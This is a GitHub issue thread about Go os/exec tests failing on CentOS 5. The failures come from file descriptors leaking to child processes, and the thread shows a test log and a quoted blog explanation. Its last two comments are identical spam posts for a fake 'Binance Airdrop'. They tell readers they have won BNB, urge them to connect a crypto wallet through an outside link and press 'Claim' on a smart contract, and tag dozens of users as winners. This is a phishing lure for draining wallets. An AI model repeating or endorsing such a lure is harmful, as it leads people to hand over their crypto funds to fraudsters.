### ISSUE TITLE
Some tests fail: file leak

### ISSUE THREAD

**Issue by darren** [darren/golang-on-centos5#1]
```go
--- FAIL: TestExtraFiles (0.09s)
    exec_test.go:480: TestExtraFiles: Something already leaked - closed fd 4
    exec_test.go:480: TestExtraFiles: Something already leaked - closed fd 5
    exec_test.go:480: TestExtraFiles: Something already leaked - closed fd 8
    exec_test.go:480: TestExtraFiles: Something already leaked - closed fd 9
    exec_test.go:480: TestExtraFiles: Something already leaked - closed fd 13
    exec_test.go:659: Run: exit status 1; stdout "leaked parent file. fd = 11; want 9\n", stderr ""
FAIL
testing: can't write /tmp/go-build050469315/b820/testlog.txt: write /tmp/go-build050469315/b820/testlog.txt: broken pipe
FAIL	os/exec	0.524s
```

**Comment by darren** [comment]
Quotes from Dave cheney's blog https://dave.cheney.net/2013/06/18/how-to-install-go-1-1-on-centos-5

> Support for the O_CLOEXEC flag passed to open(2). We attempt to work around this in the os.OpenFile function, but not all kernels that do not support this flag return an error telling us they don’t support it. The result on RHEL5/CentOS5 systems is file descriptors can leak into child processes, this isn’t a big problem, but does cause test failures.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @JamesQuinley, @jun784, @0xOptimism, @netzulo, @sumitpatel93, @xux1217, @jadeydi, @NexZhu, @Yeti978, @somerb, @s7v7nislands, @ducpin, @qdlopez, @bdsazzad3, @zgljl2012, @zicoz18, @wangke0809, @rickw, @3preston, @Cupmouse, @jimmay5469, @Pilou97, @javamr123, @samreachyan, @BlindingDark, @tipsysquid, @beyondblog, @uded, @mindfulme, @HiT0on, @demmojo, @oursy, @FangYu199, @tyndallm, @erdemozgur, @dto-simba, @liweilijie, @seii-saintway, @allensarkisyan, @free1, @mkosowsk, @Atuljaiswal123, @mrkazawa, @fisprak, @mbenatti, @Ali-alshreef, @mgogel, @klimov-ankr, @felipsoarez, @thanachaiTP

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @
